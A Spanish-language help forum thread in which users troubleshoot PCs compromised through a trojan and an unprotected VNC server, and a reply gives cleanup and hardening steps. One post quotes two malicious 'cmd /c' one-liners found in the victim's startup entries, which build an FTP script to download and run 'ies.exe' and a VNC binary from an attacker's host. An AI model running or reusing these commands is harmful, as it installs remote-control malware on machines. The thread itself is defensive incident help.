equipo entra constantemente a cmd (dos)

Hola amigos resulta que tengo 2 equipos con el siguiente problema.

cuando el equipo es encendido y entra a windows al momento de realizar la conexion de la red, este se va constantemente a pantalla de dos (cmd) y quedan 2 cursores uno en la parte superior izquierda y otro cursor cuadrado, lo demas es totalmete negro, despues de unos segundos vuelve a la parte en donde estaba la pantalla anterior y puedes seguir viendo tu escritorio o lo que tengas desplegado, pero al cabo de unos segundos es intermintete la salida de pantalla negra a pantalla normal y no deja trabajar, ya corri el nod32 ultima version y efectivamente elimino varios virus, mas sinembargo noto que cuando estos equipos entran a la red la banda ancha se vuelve terriblenmete lenta, sospecho de un troyano que este robando la señal y enviando mensajes, como puedo elimiar este problema de la maquina? a alquien le a pasado, al momento de desabilitar la tarjeta de red la banda ancha vuelve a ser rapida, si alquien tuvo esta esperiencia y resolvio el problema les agradeceria la soulcion, ya que no deseo formatear el equipo por los programas que estan instalados...gracias

A ver, realmente si que tiene toda la pinta de tener un servidor en tu PC.

Instala un firewall sin conexion a internet, una vez puesto conecta a la red y mira todos los procesos que intentan tanto salir de tu PC como acceder desde el exterior a este.

No abras ninguna ventana del navegador web y anota todas las conexiones que el firewall te detecta salientes/entrantes.

Pegalas aqui, veremos cuales son las que debes permitir y cuales no.

Inicia el administrador de tareas, ordena los procesos por usuario (con el que inicias sesion) y pega una captura para ver que procesos tienen un inicio de sesion con tu ID.

Si tienes un server (troyano) en tu PC, dependiendo del tipo de conexion que tengas (hardware) podemos saber que tipo de conexion tiene. Si estas detras de un router, el servidor debe ser de conexion inversa, es decir el server notifica al cliente cuando te conectas.

Si usas modem, el server puede ser de conexion inversa o directa, ya que el cliente es el que conecta con el servidor.

Si estas usando VNC acuerdate de desactivarlo o ponerle contraseña, yo no tenia la costumbre de hacerlo y un dia empecé a ver carpetas que yo no habia creado en mi escritorio y otro dia vi que mi cursor se empezaba a mover, alguien se habia colado en mi ordenador por el VNC dejé un poco que hiciera para ver que queria de mi ordenador, se bajó un programa, se puso a descomprimirlo, y era un mail sender, justo cuando iba a darle al START para empezar a Spammear movia el raton y no le dejaba, hasta que cuando me cansé apagué el VNC y listo, desde ese dia no se me abre ninguna carpeta ni ninguna ventana de ms-dos sin yo quererlo :)

a ver si me podeis ayudar!!!

no se si sabras que puede significar esto:

cmd /c echo OPEN 86.xxx.xx.xxx 21>x&echo USER hak>>x&echo hak>>x&echo GET "ies.exe">>x&echo QUIT>>x&FTP -n -s:x&"ies.exe"&del x&exit

o esto otro

cmd /c echo OPEN pitball.no-ip.org 21>x&echo USER hak>>x&echo hak>>x&echo GET "vnc-v1.9.exe">>x&echo QUIT>>x&FTP -n -s:x&"vnc-v1.9.exe"&del x&exit

te comento, hace 2 dias instale el vnc y abri el puerto 5900 para manejar mi ordenador desde otro ordenador remoto a traves de internet, cual fue mi sorpresa!? que hace un rato e visto el simbolo de vnc en negro que significa que esta alguien coenctado a vnc y eso que le puse un pass de 17 digitos!! el muy cabr...n me a desinstalado el antivirus, ya lo e vuelto a instalar y en ejecutar tengo estas dos entradas que te escribi arriba... sabes que puede ser? la ip la borro porq es la mia aunq es dinamica y me la cambia cada vez q apago el ruter cosa q ya e echo!

Esto mediante FTP ejecuta el archivo ies.exe (que creo que es de algún malware).


Con este casi lo mismo, pero abre una conexión con el dominio "pitball.no-ip.org" (es un dominio alojado en no-ip que es un servicio DDNS o DNS dinámico que enlaza una dirección IP fija o IP dinámica con el nombre del dominio). Descarga una versión de vnc y la ejecuta (VNC para controlar ordenadores remotos).

Si el dominio pitball.no-ip.org no es tuyo, será un dominio creado por la persona que ha entrado en tu ordenador. Si es tuyo, desactiva el programa no-ip de tu ordenador o modifica la configuración de tu router (para que no use ese dominio como servicio DDNS)

La solución más efectiva sería formatear el ordenador.

Otras posibles soluciones:
Lo mejor será iniciar el ordenador desconectado de internet.
Eliminar archivos temporales (CCleaner...)
Desactivar Restaurar sistema (en caso de que antes no quieras probar a ir a un punto de restauración anterior)
Eliminar/Desactivar elementos de inicio o servicios sospechosos (msconfig, AutoRuns...)
Pasar anti-rootkit (GMER...)
Pasar varios antispyware actualizados (malwarebytes antimalware, spybot search & Destroy, superantispyware...)
Pasar antivirus actualizado
Desactivar o desinstalar VNC.
Buscar los archivos ies.exe y vnc* y eliminarlos o renombrarlos.
Restablecer la configuración por defecto de internet explorer

Si te deja ejecutar todo este proceso en modo a prueba de errores mejor.


Si consigues solucionarlo, activa el firewall del router, modifica las contraseñas de acceso al router, abre únicamente los puertos que necesites.
Instala algún firewall en tu ordenador (gratuito>Comodo, o de pago), instala antivirus, antispyware...
Si quieres usar VNC usar una versión actualizada e ir actualizándola a medida que corrijan fallos (puedes usar UltraVNC entre otros), si necesitas un nombre de dominio gratuito para usar VNC puedes crear uno nuevo en dynDNS.
La conexión remoto mediante VNC realizala creando un túnel con SSH (por ejemplo usando FreeSSHd + Putty) para que la conexión sea segura.

Por precaución modificar la contraseña (y preguntas de restablecimiento de contraseña) de tus cuentas de correo, pon contraseña de usuario en tu ordenador (y si es posible, aunque es más molesto, usar una cuenta de usuario sin privilegios de administrador para el trabajo habitual)

Gracias por la contestación!! le e pasado 2 antivirus actualizados 2 antispyware y e borrado todos los temporales, la verdad que no tngo nada importante en el ordenador pero no me apetece formatear, tengo muchas cosas instaladas como para ponerme a instalarlas vez... encontre 1 malware despues de desinstalar el vnc que tenia que ver con el vnc lo elimine y poco mas, e cerrado todos los puertos y e cambiado las contraseñas del router, tambien tngo cortafuegos espero que siga como hasta ahora unos meses mas hasta que formatee! gracias por al constentacion, un cordial saludo!